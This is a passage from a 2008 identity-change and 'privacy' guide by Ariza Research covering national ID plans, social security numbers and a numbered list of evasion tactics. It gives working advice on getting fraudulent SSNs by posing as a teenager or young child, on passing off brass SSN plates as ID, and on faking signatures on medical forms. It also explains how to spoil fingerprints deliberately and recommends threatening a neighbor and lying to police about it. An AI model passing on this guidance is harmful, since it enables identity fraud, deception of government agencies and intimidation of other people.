certificates and drivers licenses so they will all look +alike though there is considerable resistance to the idea. If +and when this occurs, the current hodge-podge of birth +certificate forms will be history. But for now the whole system +is based on a confused conglomeration of different +document designs. +Most of these new issuing restrictions will be focused on +foreigners so those who look, act and speak like typical +Americans shouldn't have any real problems. But those who +look even a bit like an Arab will have constant problems. +INS verification of resident alien identification is being +upgraded so that instant online verification can be achieved. +Right now a two to four hour verification delay is usual and +the databases involved are notoriously inaccurate and poorly +coordinated. This will soon change. +A new database of temporary residence visas and green +cards is being assembled and will soon be available to +driver’s license bureaus all over the country. Foreign driver’s +license applicants will be carefully screened. If they're not +here legally, not only will they not get their license, they will +face immediate deportation. A system like this could have +identified the 9/11 terrorists and exposed their whole +operation years earlier. +Even if a foreign applicant passes the INS check, they'll be +issued a license that's only good for one year and is of a +different color and design than those issued to US citizens. It +will also include data on the holder's visa/green card status. +That would require them to return to the license bureau and +re-apply each year. +© Copyright 2008, Ariza Research, All rights reserved - ABP - 97 - +Reproduction in any form is prohibited without written permission. + +Their licenses will be mailed to their home address, the one +that the INS has on record even in states that issue licenses +on the spot (this would make it much more difficult for foreign +agents to slip into the US and move around freely without +any fixed US address). +This will force aliens into carefully maintaining their resident +status to avoid problems. Any policeman who stops them +would be able to instantly determine their right to be in the +US and trigger a deportation if their status is not completely +legal. +Soon all states will have online verification of applicant social +security numbers. Some do today but many don't have the +funding or motivation. Under new federal legislation they +may soon be required to set up the required systems. +Since 9/11 California has instituted restrictive new rules that +make it very difficult for foreigners to obtain drivers licenses. +Their social security number and resident status must be +verified (through the use of paper documents) with SSA and +INS by mail before a license can be mailed out. +As a result, police there now report vast numbers of aliens +driving around without licenses or insurance. For this reason +(and others) some states have recently stopped asking for +social security numbers. They include Texas, North Carolina +and Utah. These states have a lot of illegal residents and +don't want to land in the same mess as California. +Washington has made it illegal to use a person's social +security number as their drivers license number. Some +states like Ohio and Alabama ask for the number but don't +display in on the license and is not verified. Does all this +sound confusing? It is! +Some states have found the idea of using biometrics like +fingerprints or retinal scans unacceptable from a privacy +standpoint. There are problems with these systems, which +reduce their reliability. But other states have started down +that road. Hawaii, Texas, California and Colorado collect +fingerprints from drivers license applicants though they have +no way to verify them immediately at the present time. +From now on you can expect the kinds of documents they're +willing to accept to become more restrictive. In the past the +© Copyright 2008, Ariza Research, All rights reserved - ABP - 98 - +Reproduction in any form is prohibited without written permission. + +baptismal certificate was a useful ID document but it's likely +to fade into history as regulations are tightened. +Notarized copies used to do very well but you can expect +that they'll now insist on only certified copies. +Does your state do online social security number +verifications? It's easy to find out. Just go online and go the +state government site. There you will find a link that will +provide the needed information. Or you could call the license +bureau personally and just ask. Ask them exactly what +documents they'll accept. +If you've just moved to town and your personal papers are +still in transit, you'll need to know what the rules are in detail. +Then pump them for information until you get the answers +you want. +If you have a suspended or revoked license from another +state this fact will quickly be discovered if you're applying +using the same name and birth date. The NDR (National +Driver Register) will trip you up. +Funny thing here is that while the good old baptismal +certificate is now recognized as being almost worthless, +another ID document has more or less taken its place. The +voters registration card gets far more respect than it +deserves. +It's ridiculously easy to obtain. Under new rules designed to +encourage us to vote, the application procedure is almost +comical. They hand you a card. You fill it out. They take it +and say thank you. The card is then mailed to you. The only +requirement is that you have a mailing address. You'd think +a clerk would laugh at such a document, but instead they +accept it with deep respect. +Other proposed legislation would bar anyone from opening a +bank account, buying an airline ticket, boarding a plane, +starting a new job, buying a firearm or even making a retail +purchase without first presenting this new document for +online verification. By monitoring the times and locations of +your online verifications, the government could effectively +track your each and every move. +© Copyright 2008, Ariza Research, All rights reserved - ABP - 99 - +Reproduction in any form is prohibited without written permission. + +And worse, anyone who performed an online verification +would have instant access to every bit of info the federal +government has on you in all their various databases. +Information abuse could never be adequately avoided +despite the government's claims to the contrary. +If the police pull you over for any reason (and they no longer +need a reason - they can now pull you over just because you +meet a particular "profile") you'll be legally required to +produce this new document and undergo the online check. +If you are unable to produce your verifiable card, you'll be +detained or arrested until access to your files can be +restored and verified. +But if you think about it, the document itself is only important +as it contains your fingerprint data. Police cars will be +equipped with online FBI fingerprint verification systems. A +cop swipes your card through a card reader, you press your +thumb on a small sensor and your entire life's history pops +up on the computer screen in a few seconds. (Actually the +police can call up your file before they pull you over by +running your license plate number through their new +dashboard laptop computer). +Does all this make you nervous? It should scare you to +death! Our hard-won constitutionally guaranteed freedoms +are rapidly being devoured by what is fast becoming a high- +tech police state. +The second approach to a national ID involves our driver’s +licenses. Until now drivers licenses have been completely +under the control of state governments. Each state created +licenses with unique designs and various combinations of +security features. States like Michigan produce high-tech +licenses that are all but impossible to forge or alter while +Tennessee is at the other end of the spectrum with a low- +tech license they give out with few restrictions or scrutiny. +Under new legislation the states would surrender control to a +centralized federal system in Washington, DC. Washington +would then dictate exactly what information the card must +include and also it's format and color. Only those driver’s +licenses that meet the federal standard will be accepted by +the feds when citizens apply for benefits, employment or +travel. +© Copyright 2008, Ariza Research, All rights reserved - ABP - 100 - +Reproduction in any form is prohibited without written permission. + +States that don't "buckle under" to the new requirements will +be very heavily penalized and their citizens will pay a price +through federal harassment. Some federal funds for highway +construction and other uses might also be curtailed for states +that don't quickly comply with the new federal restrictions. +Fortunately for us, these well-oiled plans are way behind +schedule. The Social Security Administration has flatly +refused to become involved in the photographing and +fingerprinting of tens of millions of people. +Money is a problem also as the cost of all this has exceeded +previously established limits for unfunded new programs so +the bills have been shelved until new funds can be found. +Also, the federal demand that all drivers’ licenses bear the +holder's social security number; have been dropped for now +due to rampant identity theft. Many states allow applicants to +specify whether or not they want their SSN on their licenses. +A $10 million dollar research program was passed in early +January of 2002, which seeks to identity the biological +factors that could best be used in a new national ID card. +(IBM has created a workable online fingerprint verification +system) +Other legislation seeks to standardize both the US birth +certificate and the US state drivers licenses in preparation +for the creation of a nation-wide current drivers license +database. +The overall goal is to create an ironclad national ID card that +could be quickly verified online against DMV, NCIC (crime), +INS (immigration), IRS (taxes), vital records (birth certificate) +and gun-control databases. Any such card is at least 15 +years away but you can expect big brother to steadily move +in that direction starting with a standardized drivers license, +which could appear within a decade. +Thankfully the Bush administration has voiced opposition to +the entire idea of a national ID card and the ACLU is doing +all it can to oppose the entire concept. +On 2/19/02 news stories surfaced that outlined a new +government program aimed at starting the national ID +process with truck drivers. In the interest of road safety the +© Copyright 2008, Ariza Research, All rights reserved - ABP - 101 - +Reproduction in any form is prohibited without written permission. + +federal government is working on a national ID system with +an online verification service based in Washington, DC. The +plan is then to expand the system to include train +conductors, airline pilots and other employees who are in +positions of public trust. Is this the thin edge of the wedge? +Social Security Number Verification +During the last year the following states have begun to verify +the social security numbers of all applicants in real time +before issuing a drivers license. +Alabama, Arizona, Washington DC, Idaho, Maine, Maryland, +Massachusetts, Mississippi, Missouri, Nebraska, Nevada, +New York, Ohio, S. Dakota, Tennessee, Virginia, +Washington and Wyoming. +If you have more recent information on this trend, please +drop us a note and keep us up to date. Thanks. +Identity Theft Problems +Unfortunately, identity theft is exploding. To help combat this +new crime, many states have recently allowed applicants to +request that their drivers’ licenses not display their social +security numbers. So if you have your wallet or purse stolen, +the thief will not have your ssn. +This trend flies in the face of the new federal legislation, +which, of course, requires that the driver’s licenses include +the social security number in readable, magnetic and bar +code formats. +Currently there are two different sets of federal laws that are +on a collision course. One federal law requires that all +driver’s licenses include social security numbers within two +years while a different federal law requires that drivers have +the option of omitting their ssn from a new drivers license. +The states are very confused about their future plans. +What's the bottom line on all this? Though their original effort +has been thwarted for the present, don't expect our "friends" +in Washington to abandon their repressive plans. You can +bet they will continue to work behind the scenes. And when +© Copyright 2008, Ariza Research, All rights reserved - ABP - 102 - +Reproduction in any form is prohibited without written permission. + +they're ready, they'll "roll out" the new card under the guise +of fighting crime, drugs, child molesters and terrorism and +everything else people fear. +After our government and corporate controlled media have +fanned the flames of mass anxiety to a fever pitch, the +American people will drop to their knees and beg for the new +ID without giving a thought to the terrible effect this will have +on our hard-won freedoms. +Avoiding the Dreaded MIB +The US insurance industry maintains a centralized patient +database that they use to screen insurance applicants. This +information (usually negative) is used to deny them +insurance or services. Most of the information it contains +was obtained from insurance application forms so you +should carefully consider what you should or shouldn't write +down. +Say you ask your doctor to do some blood tests. As a matter +of routine he throws in an HIV test just to be sure. To +everyone's surprise it comes back positive. Of course you're +shocked but you are also soon to be uninsurable. +When your diagnosis hits the MIB computer, any insurance +company you apply to will have access to this information +and will quickly deny you coverage. Your existing insurer +may also soon find that you no longer belong to the target +group your present class of insurance was intended for. +In short, your insurance will soon be cancelled and +replacement insurance will be unavailable. In America only +the healthy get insurance. This insane system has got to +change! +Information is retained for a period of seven years and can +be reviewed by patients. You can get the details by phone +at: (617) 426-3660. Strangely, their records are not +organized by social security number. +If the data they have is incorrect (this has been known to +happen on occasion) - let them know and demand that they +© Copyright 2008, Ariza Research, All rights reserved - ABP - 103 - +Reproduction in any form is prohibited without written permission. + +correct their information. Threaten to launch a web site with +all the details of their abuse of your file if they won't make the +change. Or perhaps a threat of legal action will be required +to clear the logjam. +When you seek medical care, you may be handed a routine +form to sign. Somewhere near the bottom will be one or two +signature lines that will authorize them to "release medical +information to any and all that may request it". +Wow - this is a blanket authorization you really should avoid +signing. If you leave the signatures blank you can expect +some pressure to be applied (Sorry - but we can't treat you if +you don't sign here and here). +I've found the following to be the best course of action. On +each signature line write something like "release not +authorized". If you scribble it a bit, the clerk won't notice that +it's not a genuine signature. I've done this twice with no +problem at all. And if you pay cash (extremely rare these +days), you can tell the clerk that there's no need for +signatures, as you have no insurance. (Don’t forget to ask +for cash discount!) +College Towns are Great +Wonder where’s the best place to live? What kind of town +would be best? Generally speaking a new resident will stand +out in any rural setting. Also, small towns tend to be hot beds +of gossip. Everyone seems to know everyone else's +business and new arrivals are a favorite subject for the local +gossip mill. +Then there are those who want to flock to tourist areas. Here +there is a rapid turnover in people so new people should be +able to blend in and get lost. But you run the risk of running +into someone you know from home. Such an encounter +could be a complete disaster. They also tend to be +expensive places to live. +Looking at all the factors the best overall place to live would +be in a nice medium sized college town. These towns are +generally pleasant places with just the right turnover in +population. Each year a class graduates and departs while +another arrives. Also some part of the faculty changes each +© Copyright 2008, Ariza Research, All rights reserved - ABP - 104 - +Reproduction in any form is prohibited without written permission. + +year. As a result the locals get used to seeing plenty of new +faces on a regular basis. There are usually very few tourists. +Also, during economic downturns the economy of a college +town will usually remain relatively steady and unaffected. +Social Security Numbers +Up until five years ago or so, the obtaining of a new social +security number was not all that difficult but sadly things +have changed. You used to be able to apply for a new card +entirely through the mail. Today anyone over the age of 20 +must appear in person and go through an "interview". +Though it is illegal to sell forged social security cards, some +companies get away selling metal cards that look like the +original, stamped with the name and number of the holder. +The social security administration does not prosecute these +companies. Some people who don’t know better will accept +them as ID if you simply say that your original is kept in your +safety deposit box. +One of these manufacturers is: Walter Drake, 5186 Drake +Building, Colorado Springs, CO 80940 - (719) 596-3853. +They sell a nifty solid brass "card" (item number P4004 - +Social Security Plate - $3.99 plus $2.95 shipping). If this firm +is no around, look around the web under "aluminum social +security card". +Most SSN applicants are infants whose parents must obtain +a new number in order to claim them as dependents on their +taxes or teenagers who need the number so they can start +working. Men over the age of 20 are going to have a tough +time qualifying for a new social security number. Women +who were recently divorced commonly apply for new +numbers as they claim they never needed one before. This +interview should present no problem for a woman, +particularly if she has recent divorce papers with her. +An old friend who lived overseas for many years came up +with the following. He was an oil worker who worked in the +oil fields of Saudi Arabia. When he was 35 years old he +returned to the U.S. and had to apply for a SSN. He strolled +into the social security office and was promptly interrogated. +He explained his situation and produced documents +© Copyright 2008, Ariza Research, All rights reserved - ABP - 105 - +Reproduction in any form is prohibited without written permission. + +supporting his story. He promptly got his new SSN number. +He was treated well and had no problems. +The social security people will verify your BC (If you’re over +age 17) and may even verify your new parents’ birth +certificates. No problem there. Also, the application requires +a local phone number (which they may trace to find your +address and real name) should the application run into any +problems. Before you leave their office ask if you can phone +in for your new number rather than waiting for their snail-like +bureaucracy to grind out a card. +Some commercial post box rental stores offer a "stand-alone +voice-mail" system that will allow you to record a recording +using your own name and voice. +This will create a good image should the social security +people call. Such a number is not easily traced. You might +want to rent a PO box at the PO box rental store. This will +allow you to use a PO box while providing a street address +that looks like an apartment address. (Example: 123 Main +St. Apt 456 instead of PO Box 456) +A note about forged social security cards: In the late +seventies there were a slew of mail order firms that sold +blank social security cards for two bucks each. No longer. A +new federal law makes it a federal felony to make or sell +forged SSN cards. +In major cities there are sleazy-looking characters strolling +around the streets offering to get you any kind of ID you +want. They demand cash up front and guess what happens - +they run off never to be seen again. it’s a neat crime as the +customers never report the crime. Let the buyer beware! +This gem comes from numerous sources. Simply write up a +request for a SSN application in pen on a sheet of notebook +paper. Make the letter look like a sixteen-year-old girl wrote +it. The social security people receive tons of these letters +everyday. You apply as if you are only sixteen. (Your new +parents will have to have lived long enough to raise you +however.) You then submit your application, get your new +SSN and use it no matter your age. +© Copyright 2008, Ariza Research, All rights reserved - ABP - 106 - +Reproduction in any form is prohibited without written permission. + +Update: The technique above may still work but recent +changes to social security regulations are intended to restrict +the issuance of new social security numbers to small +children only. +It's clear that big brother is moving toward a system where +only newborn babies will be issued new numbers. But there +are still millions of small children out there who don't have +numbers issued to them yet. +The best strategy now is to submit an application for what +appears to be your child - under age 5. Find the "social +security online" site (you can find it using any major search +engine). Carefully read up on the latest rules regarding +childhood applications. +Once the number is issued it can be used in almost any way. +The social security people won't care, as they have no +reason to launch expensive investigations. On your +application you can simply transpose two numbers in the +birth date which throws it open for you to, at some future +date, claim that a typographical error was made. +And since the age of the applicant appears to be under age +18, there is no need for the dreaded "mandatory personal +interview". +Old Cards - New Cards +The social security card is a funny sort of document. When +the cards first came out many people were concerned that +the government would use the social security number to +track citizens. To help reduce these fears early cards had +"Not for Identification Purposes" stamped across them in +red. +Those old fears were well founded. Today when you give +someone your social security number you are providing +them the key to all your computerized records private and +public. Worst of all, you have no way of controlling who +views what. +Those early fears are why the social security card contains +so little information. Only your name and number appear. +This makes it a very unusual form of ID. By itself it's almost +© Copyright 2008, Ariza Research, All rights reserved - ABP - 107 - +Reproduction in any form is prohibited without written permission. + +worthless. But used in conjunction with the most important +primary form of ID, a driver’s license, you have the magical +combination that can open many doors. +You can't get a job without one. It's taken as defacto proof of +US citizenship, you'll need one to open a bank account and +your drivers license number may (or may not) be your social +security number. The IRS (since 1961) and schools use the +SSN for their records. The card may not provide much +information, but it's an absolute necessity for new identity +changers. +Very Best Names +The very best first names for our purposes are those that are +not gender-specific such as Francis, Pat, Terry, Rob (Robert +or Roberta) or Dana. This adds yet another confusion factor +to confuse anyone interested in your new name. +Before 9/11 almost any name would do but today it's best to +stick to American sounding surnames. Names like Hamilton, +Peterson, Anderson, Sullivan and Smith are typical names +that anyone would rapidly identify as being American. +Muhammad al Tarif is an example of a name you would want +to carefully avoid these days. +Forging a Social Security Card +In 1983 the social security administration came out with a +new social security card. It's printed on a special tamper +resistant stock that is held in a single vault in Maryland. +Take a good look at it and you'll see that the background is +marbled in a very tricky way and that the red insignia is +intertwined with the text. This makes it very difficult to forge +or modify. In addition, a new law forbids holders from +laminating the card. (Lamination makes it all but impossible +to detect tampering) +That's the bad news. Now for some good news: The older, +easier to alter cards are still valid. So if your working history +started before 1983, the older less tamper-resistant card is +still very useful. The old card was printed on plain old white +card stock and was very often laminated. +© Copyright 2008, Ariza Research, All rights reserved - ABP - 108 - +Reproduction in any form is prohibited without written permission. + +You should also know that foreigners who live or do +business in the US are issued special social security cards +that look like the others except they bear a warning "Not for +Employment Purposes" across their face. Under IRS rules +foreigners must pay US taxes for any income they earn while +here even though they are citizens of some other country. +These cards are used to help track their earnings and be +sure they pay their US taxes. +There have been those who have used this information as +foreign birth certificates come in a bewildering variety of +colors and shapes. +The social security administration issues these foreign cards +without much fuss, as they are only good for paying taxes. +Perhaps you know someone who was born overseas and +has their original foreign BC. +How to Verify a Social Security Number +An employer can verify a social security number by calling: +1-800-772-6270 (7am to 7pm EST). +You'll need the following information: +1. The social security number +2. First and last name +3. Date of birth +4. Gender +© Copyright 2008, Ariza Research, All rights reserved - ABP - 109 - +Reproduction in any form is prohibited without written permission. + +92 Advanced Privacy Tactics +1. Checks should never be cashed at a local bar. Those +dives are monitored by local law enforcement. Reports of +arrests made in local neighborhood bars appear in the paper +on a regular basis. They know that if the man they’re after +isn’t in one of these crappy local bars, someone there will +probably know where he is. +2. Make all phone calls from a pay phone and change which +pay phone you use from time to time. If you would rather call +from home, purchase one of those "Caller ID blockers" +boxes from Radio Shack. It's a little plastic box that connects +between your phone and the line outlet on the wall. They +cost about $20 and are well worth the price as they block +any attempt to retrieve your number when you make an +outgoing call. Some come with a little on/off switch that you +can use to enable caller-id if you need to. When you lift the +phone the box lets you know it's working by giving you three +little beeps. The phone company in most areas provides a +free way to turn off your caller-id but it isn't as effective as +the Radio Shack box. +3. At work avoid giving your fellow employees too much info. +Don't let the gossip mill get interested in you. Give them a +minimum of info in a way that satisfies them but avoid giving +them too much grist for the mill. +4. Drop any magazine or newspaper subscriptions you may +have. If you miss your favorite magazine, buy copies from a +newsstand for cash. Don't order special magazines through +a stand or bookstore. If you really need to get a copy of a +hard to find magazine, call the magazine and ask them for +the address of the nearest retail outlet that carries their +magazine or visit your local library. +5. Avoid attending any sort of religious services. If you feel +the need, read your bible and pray at home. If you must +attend a church, be sure to provide them with a phony name. +Make donations in cash only. Do not provide other church +members with any personal information. They can be real +nosy gossips, especially in small towns. In the south church +members spend half their time praying and the other half +© Copyright 2008, Ariza Research, All rights reserved - ABP - 110 - +Reproduction in any form is prohibited without written permission. + +gossiping about the newest arrivals in town. +If a snoop knows that you are a religious Catholic, they'll +check around with the Catholics in any area they suspect +you might be living. +And if you're a dedicated member of some smaller faith, it +makes the snoops job easier as there are fewer churches to +search. +6. Keep your personal schedule as varied as possible. Don't +come and go like clockwork. You don't want to be too +predictable at this stage. Your daily personal movements +should match the story you give your neighbors as much as +possible. If you told them you have a job, they'll expect you +to leave early each morning and arrive back home in the +early evening. Don't give them any reason to doubt your +truthfulness. +7. No matter how difficult it might be - carefully avoid +arguments. Your new neighbor may be the worst idiot you've +ever met, but no matter how insane his actions or +comments, avoid getting involved in arguments with him. Be +nice and swallow your anger. Don't throw parties, keep your +music down low, don't keep pets, keep your lawn clean and +live the life of a monk at least for the immediate future. If +you're forced into putting a neighbor in his place, speak to +them man to man and be very sure you're alone. Speak in +low tones to be sure you're not overheard. Tell him that you +killed better men than them in Vietnam (or if you're younger - +the Gulf War). +Unless he's a man of substance and character (and there +are damned few of them around these days) - he'll cave in +and keep his distance. (I pulled this stunt once and the guy +was so terrorized he packed up his whole family and moved +out of state the very next week!) If he calls the cops and they +come to visit, be as nice as you can be. Deny that you +threatened him in any way and stick to your story. Try to +appear as reasonable and clean cut as possible. Do not get +angry. Do not raise your voice. Deny everything. With no +witness they'll have no probable cause to arrest you. When it +comes down to his word against yours - the cops will leave +you be if you look credible. The police are experts at making +© Copyright 2008, Ariza Research, All rights reserved - ABP - 111 - +Reproduction in any form is prohibited without written permission. + +on the spot decisions and they'll almost always side with the +most credible looking of the two parties. +8. Never deposit a check in an account that bears your +name. Instead take the check to the issuing bank and cash it +there. If the checks are regular paychecks, try to vary which +bank branch you visit along with the time of day and day of +the week. Don't make small talk with the teller. Always stay +low key. +9. Pay your bills in cash whenever possible. Money orders +can also be used but be sure to leave the payer line blank. +Money orders, particularly those from smaller firms sold +through convenience stores are your best bet. They're +tracked by their number not by your name. Never attempt to +buy a money order for more than $700 as the issuing firms +are required to submit a report to big brother on large +transactions. +10. If you have to visit a doctor or dentist, be careful about +providing genuine information. Pay in cash. Remember, +medical records are wide open to snoops and insurance +companies. What you tell your attorney is confidential but +what you tell your doc might as well appear on the front page +of the newspaper! Later when you have your new identity in +place, you can use a new doctor to help build your new +identity. If you have an unusual medical problem or need +unusual medications, snoops can use this information to +locate you. +11. Be careful about having anything delivered to your new +home. Your neighbors may notice any unusual deliveries. If +you're not home, a delivery service may automatically ask +your neighbor to receive and hold your package for you. This +would cause some raised eyebrows. Don't feed the rumor +mill. +12. Avoid joining any sort of group. A new membership will +provide a snoop with a direct link to you if the group is +involved in activities you enjoyed in your old life. Also, your +fellow members will be asking questions and talking about +you behind your back. Why expose yourself needlessly? +© Copyright 2008, Ariza Research, All rights reserved - ABP - 112 - +Reproduction in any form is prohibited without written permission. + +13. Never sign for a certified or registered letter or package +unless you know exactly what it is and who sent it. Skip +tracers love to use certified mail, as it's a cheap and quick +way to locate someone. They'll send a letter out via certified +mail to an address they suspect you may be using. If a +mailman appears on your doorstep, go to the door. If the +item is addressed to your old name - say "who?" and them +tell him that no one by that name lives at this address. +Or if your situation warrants it, you might want to send your +pursuers on a wild goose chase by saying that the +addressee used to live here but left last month when he got +a two-year contract to do some wilderness photography or +"mission work" down in Argentina. Skip tracers may also +send a letter to someone you don't know (probably a made +up name) and send it “in care of" you. They hope this will +cause you to lower your guard, as you would naturally want +to help a friend. +Or they may make the letter look like a check (a favorite +stunt). Don't fall for their tricks. If it arrives in the mail, write +"Addressee Unknown" or "Deceased" on it and drop it in the +nearest mailbox. +Be aware that when you get suspicious mail you just may be +in for a personal visit from a snoop. Be sure to notify anyone +that knows your true whereabouts not to forward ANY mail, +no matter the situation. Warn them that a snoop may pose +as an attorney who has a large check for you (from the +estate of an old friend of yours that recently died) and just +wants to know where to send the money so they can close +their books. It's an old trick that often still works. +14. Don't agree to accept the charges on a person-to-person +collect call. Just hang up. If you have a home phone, go +down to Radio Shack and buy one of their "Caller-ID +Blockers". An answering machine would also be a good +investment. Have your recording answer the phone with your +new name. "Hi this is Sam - I'm away from the phone right +now - Please leave a message and I'll get back to you as +soon as possible - thanks". This will throw off anyone who +calls looking for someone named Bill. You might also want to +© Copyright 2008, Ariza Research, All rights reserved - ABP - 113 - +Reproduction in any form is prohibited without written permission. + +mask your voice a bit also. Don't include any other info in +your recording. +15. Be very careful what you tell your new neighbors. It's +best if you can provide the usual type of info. No more, no +less. If the information you provide is too vague or if you're +unwilling to share any info at all, it will raise a red flag with +your new neighbors and their gossip will shift into high gear. +So just have a story down pat and provide them with what +they expect. Always remember, your new neighbors are your +enemy. Don't confide in them, no matter how nice they +seem. Snoops may well give them a call. And since they +have no stake in your situation, they'll cooperate and spill the +beans. And be especially careful with lonely old lady +neighbors. Smile and be extremely nice to them. +Little old ladies are a paranoid bunch who will call the cops +at the drop of a hat if they dislike you or disapprove of your +lifestyle. Your dog barks - they call the cops. Your stereo is +too loud - they call the cops. They hear loud voices - they +call the cops. And they can make up some really wild tales +that will have the local police all over you. With the exception +of a lover, a neighbor is the second most likely person to +"blow your cover". +16. If you need a prescription filled, be very careful. Take +each prescription to a different pharmacy. Be careful about +providing a pharmacy with too much genuine information. If +you have an ongoing need for a particular drug you might +consider using one of those mail-order pharmacies. They +can ship you three months worth of your medicine right to +your doorstep. Always ask your doc if there is a generic +version of the drug you need as you won't have any +insurance so will need to pay full price. Some drugs can get +extremely expensive when you're paying full retail. If you +need a rare medicine you should know that snoops can use +this info against you. They can "flag" drug company +computers to notify them of all purchases of low-volume +medicines. +17. No matter what situation might arise, always be prepared +to provide a believable story as to who you are, where you +are coming from and where you are going to. Investigators +can smell a lie so you'll need to be so well prepared that you +can lie smoothly. (Just pretend you're a politician!) +© Copyright 2008, Ariza Research, All rights reserved - ABP - 114 - +Reproduction in any form is prohibited without written permission. + +18. Avoid taking long walks or drives at night. To do so +would expose you to the unwanted attentions of the police +that come out at night. +19. Always drive the speed limit. This should be obvious but +then it's the obvious things that are the ruin of most identity- +changers. Strangely, the state troopers that patrol the +freeways will become suspicious if a car is driving exactly at +or just below the post speed limit. So just blend into the +traffic flow (which is usually moving along at around 5mph +over the limit). +20. Maintain a lower middle-class standard of living. If you're +too poor or too affluent you'll attract attention. Your car can +cause you problems if it's too expensive and so doesn't fit +into the story you provided your neighbors. +21. If you feel the need to "blow off steam" by partying - do it +somewhere else. Try a tourist spot or at least another city +(preferably in another state). How about Las Vegas or +Atlantic City? Don't do it anywhere near your home. +22. Cut your hair. Neat, clean and conservative is the look +you're shooting for. Shorter hair also makes you look +younger. Investigators can, with incredible precision, pick the +criminals out of a lineup simply by their long hair, odd +beards, cryptic tattoos and gaudy clothing. Above all you +need to blend in with your community and appear as though +you really belong there. +23. Become invisible. I had a friend who worked for the CIA +as an intelligence officer. He told me that part of his training +involved becoming invisible. To learn this art he would walk +around the downtown area of a major city visiting various +stores. He wore bland colored clothes, no personal jewelry +except for a plain looking Timex watch with a plain black +band. As he moved around he would avoid making eye +contact with anyone. +He would walk slowly and as quietly as possible. He would +keep his mind concentrated on distant places. He would +keep his left hand in his coat pocket and let his right swing +free. He kept his head tilted slightly down, his face +expressionless, his arms close to his sides and spoke in low +tones. He would not respond to loud sounds. When he made +a purchase he would say nothing to the clerk and would +© Copyright 2008, Ariza Research, All rights reserved - ABP - 115 - +Reproduction in any form is prohibited without written permission. + +keep his eyes focused on something twenty or thirty feet +away. +After a few weeks of practice he could walk into a store +spend a half hour there, make several purchases and leave +without being noticed at all. When the sales staff were +questioned about him, they could accurately describe the +other customers in the store at the time but drew a complete +blank on my friend! They remembered him being there but +couldn't come up with anything like an accurate description. +He had become truly invisible. Whenever your walking +around in public, keep this in mind. +24. If approached or arrested by a law enforcement type say +nothing. If you do speak, tell the truth (though you don't have +any obligation to tell the whole truth). Lying to a cop is a +crime, which might get you arrested but being silent, isn't. +Remember, cops will test your truthfulness by asking a +question they already know the answer to. +Check the ACLU's web site. They have a nifty little card that +summarizes your legal rights when you're arrested. Get one +and memorize it. If they take you in for questioning the first +words from your mouth should be "I have nothing to say until +I talk to a lawyer". In most states the interrogation must, by +law, come to a complete halt until you've consulted with your +attorney. Anything you say after asking for your attorney will +probably be of no use in a court of law. +They may tell you that it's in your interest to cooperate (let a +lawyer confirm this before you speak). If they continue to +question you - ask to go to the bathroom. If they refuse to let +you go, keep asking. Ask for a doctor if you're sick (all this +stress is probably giving you a headache - right?) or have +been injured. If they ignore your demands keep repeating +them. Take special note and report their actions and exact +words verbatim to your attorney. They can be quite useful +later in court. Above all stay cool and ignore their verbal +assault. +Bluffing is a very common tactic. They may something like +"We know everything so you might as well spill the beans" +when they're really completely in the dark. Or "you friend told +us everything so you might as well come clean". It's called +"fishing". Think thoughts that are relaxing. Think of an old +© Copyright 2008, Ariza Research, All rights reserved - ABP - 116 - +Reproduction in any form is prohibited without written permission. + +girlfriend; think about baseball or a walk you took in the +woods. Don’t let them get under your skin. Oh, another thing +- start watching the TV program "Law and Order". +You'll learn a lot about how the law works. Always +remember, you have rights but it's a sad fact that you and +you alone will have to protect them. +25. Stay completely clear of illegal drugs. A single joint can +get you arrested and completely blow your cover. Stay away +from people who use drugs and be especially careful to +avoid people who sell them. Using illegal drugs at this point +is a really fast way to get busted. If you're new in town, that +nice guy who sells you drugs may well be an undercover +cop. Or you might get involved in a drug rip-off transaction, +which is worse as you may get shot. And when you're in the +can for that stupid joint you had hidden in your wallet - they'll +just take a few moments to run you through their little +computer. If you just have to get high, stick with my old +friend Jack Daniels. +26. Avoid pursuing any business or hobby that might attract +undue attention. Maybe you just love to make porno movies +or try your car out at the local drag races but trust me - now +is not the time. Applying for any sort of official license will get +your personal info entered into several easily searchable +government computers. +27. During the first year you should avoid being +fingerprinted. Avoid applying for sensitive or government +jobs as they almost always involve fingerprinting. When +applying for jobs listen carefully for any mention of a security +clearance being necessary. +Ask if you'll have to get one and if they say it's required by +the job, say "no problem" and quietly move on to another job +opportunity. The fingerprint that some states now require for +the issuance of a drivers license can however be ignored (at +least for the immediate future). The prints are retained on file +but are not sent off to the FBI. They're just trying to +intimidate you. +Most people are unaware that getting a useful fingerprint is +actually quite difficult. The finger must be pressed down with +just the right pressure. The finger must not rotate at all as +even the slightest rotation will render the print unusable. Add +© Copyright 2008, Ariza Research, All rights reserved - ABP - 117 - +Reproduction in any form is prohibited without written permission. + +to this the fact that most fingerprint takers are poorly trained +idiots (except those found in police departments) so you +know what to do. +Press down too hard and rotate your finger slightly to +produce a useless print. It can take even an experienced +finger printer several attempts to get a good set of prints. +28. Avoid attending parties where you suspect illegal +activities may occur. That includes drugs, hookers etc. Being +caught up in a drug bust would be foolish right now. +29. Avoid public demonstrations or activist activities that +might expose you to mass arrest and screening. +30. If you need to have utilities installed, be very careful +about revealing too much personal information. Very few +utility companies have online verification available. Utility +records are an open book to snoops both private and official. +Anyone who recently lived overseas would lack the usual +utility references. They'll probably want a larger deposit as a +result. Pay it, it's a good investment. +31. Avoid applying for any sort of license if you can. Want to +go hunting? Do it in another state. +32. Create a new personal address book. Buy a brand new +one, transfer all the names in your present book in and then +code the phone numbers so that only you can make sense +of them. Make sure your code is tricky enough to fool an +experienced investigator. Just adding the number 3 to each +digit is far too simple. Adding three to the first digit and then +subtracting three from the next might work. Or make up a +new book and load it with random names and numbers +taken from the phone book. Then keep your real address +book in another carefully hidden location. +33. If you use the services of a "working girl", be sure to +keep her in the dark. These gals can be very dangerous +indeed. Pay her in cash and if she asks, give her some +phony personal story. She's used to this as most men don't +want a hooker to know anything about their personal lives. +Or use the old story "my wife doesn't understand me!". No +matter how nice she seems - she is not to be trusted! If you +plan to leave the area or stop using her services, whatever +you do - don't tell her in advance. +© Copyright 2008, Ariza Research, All rights reserved - ABP - 118 - +Reproduction in any form is prohibited without written permission. + +On your last visit just show up as usual and depart leaving +her thinking that she'll be seeing you again real soon. She +sees you primarily as a source of income and people tend to +get cranky when they lose their meal ticket. Once she knows +you're gone, her loyalty to you is finished and she'll readily +reveal everything she knows about you to the first person +that asks. But she can't reveal what she doesn't know. +34. Make small financial deals. When you must do business +with a bank be careful as transactions over $800 are now +recorded on special forms the data from which is widely +distributed in the law enforcement community. If you get to +know a teller well enough, she'll tell you that every bank +branch is now required by 